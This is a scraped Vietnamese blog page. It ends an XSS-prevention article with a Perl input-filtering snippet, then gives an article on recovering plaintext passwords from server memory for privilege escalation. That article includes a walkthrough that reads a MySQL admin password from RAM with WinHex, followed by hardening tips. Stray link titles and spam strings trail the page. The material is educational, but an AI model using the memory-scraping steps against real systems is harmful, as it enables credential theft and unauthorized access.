Tất nhiên với phương pháp này bạn cũng có thể áp dụng đối với các ngôn ngữ Web Application khác (ASP, PHP...). Để kiểm tra việc lọc và mã hoá dữ liệu trước khi in ra, các bạn có thể dùng một chương trình được viết bằng ngôn nhữ PHP, đặc biệt nó được thiết kế để phòng chống các lỗi XSS. Bạn có thể lấy mã nguồn chương trình từ http://www.mricon.com/html/phpfilter.html
Lọc và mã hoá các dữ liệu cho vấn là cách tốt nhất để chống XSS nhưng nếu bạn đang sử dụng mod_perl trên Apache Server thì bạn có thể dùng ngay module Apache::TaintRequest. Khi đó mã nguồn chương trình sẽ có dạng :

Code:

use Apache::TaintRequest;

my $apr = Apache::TaintRequest->new(Apache->request);
my $text = $apr->param('text');

$r->content_type("text/html");
$r->send_http_header;

$text =~ s/[^A-Za-z0-9 ]//;
$r->print("You entered ", $text);

Kĩ thuật XSS được mô tả lần đầu tiên cách đây 2 năm và hầu hết các khả năng tiềm ẩn của kĩ thuật này đã được biết đến. Tuy nhiên chúng ta mới chỉ khắc phục được một phần của nó. Không phải vô tình mà Yahoo Mail lại để sót một lỗi XSS trong bộ lọc của mình. Một phương pháp tối ưu vẫn còn đang ở phía trước.

Phat hien password trong bo nho (vuhoang.mylivepage.com)

05 Jan 07 17:28:07 GMT

Phat hien password trong bo nho
169 days ago 2006-07-19 17:05:07 Quote

Phát hiện Password trong Bộ nhớ

1. Giới thiệu:
Sự leo thang đặc quyền có thể hiểu đơn giản là một phương thức tấn công mà với cách này, các User có quyền hạn thấp hơn sẽ tấn công vào một điểm dễ bị tổn thương nhất của hệ thống để trở thành một người quản trị hoặc có thể trở thành các User có quyền hạn cao hơn. Cách để leo thang đặc quyền mà ta có thể nghĩ ngay đến đó là việc chiếm quyền thông qua crack password của người quản trị, tấn công tràn bộ đệm của máy đó và ăn cắp password. Bài phân tích này sẽ đưa ra một điểm yếu chung mà có thể được khai thác để ăn cắp password và sau đó là leo thang đặc quyền. Và cũng qua bài phân tích này, chúng ta sẽ thấy được các nhược điểm của các hệ thống từ đó đánh giá đúng hơn về việc tấn công leo thang đặc quyền và tầm quan trọng của việc tiến hành vá lỗi liên tục cho hệ thống.

2. Yếu điểm để tấn công:
Khi các server và các ứng dụng lưu trữ password được mã hoá hoặc dạng số trong ổ cứng, chúng ta thấy rằng trong một vài trường hợp thì việc mã hoá không được áp dụng cho việc lưu trữ password trong bộ nhớ. Các truy cập thông thường đến bộ nhớ không bị giới hạn bởi các quyền truy cập của các nhóm user. Chính vì vậy, các attackers với các truy cập vào hệ thống có thể đọc được bộ nhớ và các password không mã hoá. Việc sử dụng các chương trình truy cập trực tiếp vào bộ nhớ sẽ giúp cho các Attacker kiểm soát được việc xử lý trong một vùng nhớ nào đó và có thể đọc các thông tin của password này. Các password có thể là password quản trị của một server, một password của user cho các ứng dụng hoặc là một password cho cơ sở dữ liệu. Và chỉ cần phát hiện ra được một Password cho ứng dụng thì coi như việc tấn công leo thang đặc quyền đã thành công. Vì vậy bất cứ ứng dụng nào mà việc sử dụng các password cho việc xác thực không được mã hoá thì đều có thể được xem như là một điểm yếu của hệ thống và tại đây việc tấn công leo thang đặc quyền đều có thể xảy ra.

3. Vị trí của Password trong bộ nhớ:
Một chương trình hiển thị bộ nhớ sẽ đưa ra toàn bộ các đoạn mã và các dữ liệu được xử lý tại memory. Dữ liệu chung là tương đối lớn và có thể bao gồm cả các dữ liệu được mã hoá cũng như các dữ liệu ở dạng Text. Password có thể nằm trong bộ nhớ tại hai vị trí sau:
Bằng cách tìm các password tại các vị trí cố định trong bộ nhớ. Tất cả các cài đặt của các chương trình ứng dụng bao gồm cả các password đều được đặt tại một vị trí cố định trong bộ nhớ. Ví dụ, tất cả các truy cập của một server đều được lưu trữ password tại vị trí 10BD862C. Khi địa chỉ này được xác định thì password có thể được giải mã ra từ bộ nhớ nếu một Attacker có thể đọc được các thông tin trong bộ nhớ. Để phát hiện vị trí của một password của một ứng dụng, các attacker có thể tự cài đặt một ứng dụng tương tự trên hệ thống của họ, sau đó sẽ tìm kiếm vị trí của password trong bộ nhớ, sau khi tìm xong, attacker có thể sử dụng vị trí đó để có thể tiến hành tìm kiếm password trên máy của nạn nhân.
Một cách khác đó là attacker sẽ sử dụng các tên của User và Password dùng chung của cùng một hệ thống. Ví dụ, các attacker có thể tạo ra các mẫu User và Password trên hệ thống của họ, sau đó dùng các chương trình hiển thị giá trị của bộ nhớ, và tìm đến vị trí của các user mẫu, ví dụ tên “Admin”, “Administrator”, “Administrators”,… và như vậy sẽ kiếm được các thông tin về các giá trị này.
4. Password sẽ được lưu trong bộ nhớ khi nào ?
Hãy xem qua ví dụ sau đây và bạn sẽ hiểu được khi nào thì password sẽ được lưu vào bộ nhớ:
Khi một ứng dụng tại server được khởi động, nó sẽ đọc các đối số trong các dòng lệnh của Java và các biến môi trường và kết nối đến một cổng TCP. Ứng dụng sẽ xác định hệ điều hành mà user sử dụng và nhóm làm việc (thực hiện xác thực). Ứng dụng cũng sẽ kiểm tra một file cấu hình để lấy tất cả các thông tin cấu hình của nó.
Trong lúc khởi động, server tải password của người quản trị vào trong bộ nhớ dưới dạng Plain text. Trong số trường hợp khác, file cấu hình có thể cung cấp thông tin để kết nối đến các nguồn CSDL bao gồm cả password để đăng nhập vào CSDL. Server cũng tải các password vào bộ nhớ dưới dạng plain text. Một số lựa chọn khác cho phép password có thể không được load khi server được khởi động nhưng nó vẫn xuất hiện trong bộ nhớ khi người quản trị hoặc một user đã được xác thực. Sau đó, password sẽ vẫn được lưu trong bộ nhớ mặc dù user đó đã log out.

5. Thực nghiệm:
Chúng ta hãy thực hiện một thực nghiệm sau để chứng tỏ vấn đề trên. Tuy nhiên có thể bạn sẽ không thể thành công ngay lần đầu tiên. Bạn có thể tiến hành như sau:
Ø Xác định một server, một server ứng dụng hoặc là một webserver. Server tải các password quản trị vào bộ nhớ khi nó được khởi động, Các attacker sẽ sử dụng các tài khoản của họ để đăng nhập vào hệ thống và mở một chwong trình hiển thị thông tin bộ nhớ. Với các chương trình hiển thị thông tin bộ nhớ, họ có thể xem được các thông tin về password của các user. Sau khi đã biết được các thông số đó, cuộc tấn công leo thang đặc quyền sẽ được thực hiện.
Ø Trong một trường hợp khác, server không load password lúc khởi động, nhưng nó sẽ được load vào bộ nhớ khi người quản trị được xác thực. Sau đó pass này sẽ được lưu trữ trong suốt quá trình server chạy. Mặc dù việc truy cập của người quản trị là thông qua truy cập từ xa nhưng bộ nhớ của server vẫn lưu trữ password dưới dạng plain text và có thể được phát hiện.
Ø Và sau đây là trường hợp mà các password của một CSDL bị các attacker tấn công. Phát hiện một server được sử dụng để lưu trữ CSDL. Các kết nối đến nguồn sẽ bao gồm thông tin về username và password của CSDL. Khi server được khởi động nó sẽ load password của cơ sở dữ liệu vào bộ nhớ khi kết nối đến nguồn. Tương tự như trên, chỉ cần sử dụng các chương trình hiển thị thông tin bộ nhớ và tìm kiếm password.

Để thực hiện những gì đã nói trên, tại ví dụ, tôi sử dụng chương trình MySQL, và Winhex.
Sau khi cài đặt MySQL, tôi đặt user và pass là admin/adminvn. Thực hiện đăng nhập như là một hành động của một nhà quản trị mạng. Sau đó Log out, lúc này, tôi cũng đóng vai Attacker đã tiếp cận được Server về mặt vật lý. Tôi cho chạy chương trình Winhex. Lưu ý chương trình này có thể chạy mà không cần phải cài đặt. Sau khi chạy chương trình, tại cửa sổ Winhex, chọn Tools > RAM Editor > WinmySQLAdmin > sau đó tìm user Admin (Bạn có thể xem hình)... Như vậy đã thành công.

Pictor

6. Vấn đề mất passwordĐây là một vấn đề được nhắc đến nhiều trong việc hạn chế các tấn công của attacker. Nhân đây cũng nhắc lại về vấn đề này luôn, bạn có thể chú ý một số điểm sau:
- Thay đổi password thường xuyên để không bị mất password.
- Các password cần được đặt gồm đủ các ký tự cả số, không nên đặt password có liên quan đến bản thân vì như vậy làm tăng nguy cơ password bị attacker đoán được.
- Nên xoá các user không cần thiết sử dụng nếu như thật sự không cần nhằm giảm nguy cơ bị tấn công leo thang đặc quyền.
- Một số lưu ý nữa bạn có thể tham khảo thêm các chủ đề liên quan.

7. Vấn đề về tấn công điểm yếu:
Cách tốt nhất để hạn chế đến mức tối đa vấn đề đã được nêu trên đó là:
- Không cho người lạ mặt tìm hiểu về hệ thống và có các tác động vật lý vào server.
- Thiết lập quyền không cho cài đặt các chương trình lạ đối với các user không tin cậy vào máy server.

quoccuong.mylivepage.com

OSC - Gaixinh (vuhoang.mylivepage.com)

No subject

Những kiểu tấn công của hacker hiện nay (vuhoang.mylivepage.com)

No subject

No subject

dee

潜水泵 搞笑

Gioi thieu so luong ve cach tan cong CROSS-SITE SCRIPTING - vuhoang.mylivepage.com

Phat hien password trong bo nho (vuhoang.mylivepage.com)

潜水泵搞笑